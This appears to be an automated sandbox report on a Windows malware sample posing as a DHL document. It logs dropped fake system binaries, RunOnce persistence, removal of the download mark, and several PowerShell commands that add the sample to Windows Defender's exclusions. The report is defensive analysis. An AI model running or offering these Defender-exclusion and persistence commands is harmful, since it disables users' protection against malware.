Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document11022020680908911.exe' -Force
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Users\user\Desktop\DHL_document11022020680908911.exe C:\Users\user\Desktop\DHL_document11022020680908911.exe
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Users\user\Desktop\DHL_document11022020680908911.exe C:\Users\user\Desktop\DHL_document11022020680908911.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: DHL_document11022020680908911.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DHL_document11022020680908911.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: \??\C:\Windows\dll\System.pdb source: DHL_document11022020680908911.exe, 00000010.00000003.401824383.000000000717D000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: DHL_document11022020680908911.exe, 00000010.00000003.401824383.000000000717D000.00000004.00000001.sdmp
Source:	Binary string: System.pdb source: DHL_document11022020680908911.exe, 00000010.00000003.410586054.000000000714D000.00000004.00000001.sdmp

Source: DHL_document11022020680908911.exe

Static PE information: 0xB5100D24 [Mon Apr 5 21:20:36 2066 UTC]

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

Code function: 0_2_02FB4C63 push eax; iretd

Persistence and Installation Behavior:

Drops PE files with benign system names

Show sources

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

File created: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe

Executable created and started: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	File created: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe			Jump to dropped file
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe			Jump to dropped file

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

File created: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe

Jump to dropped file

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce YjhEmlfdsnrvbvoUtFds

Jump to behavior

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce YjhEmlfdsnrvbvoUtFds	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce YjhEmlfdsnrvbvoUtFds	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce YjhEmlfdsnrvbvoUtFds	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce YjhEmlfdsnrvbvoUtFds	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

File opened: C:\Users\user\Desktop\DHL_document11022020680908911.exe:Zone.Identifier read attributes | delete

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
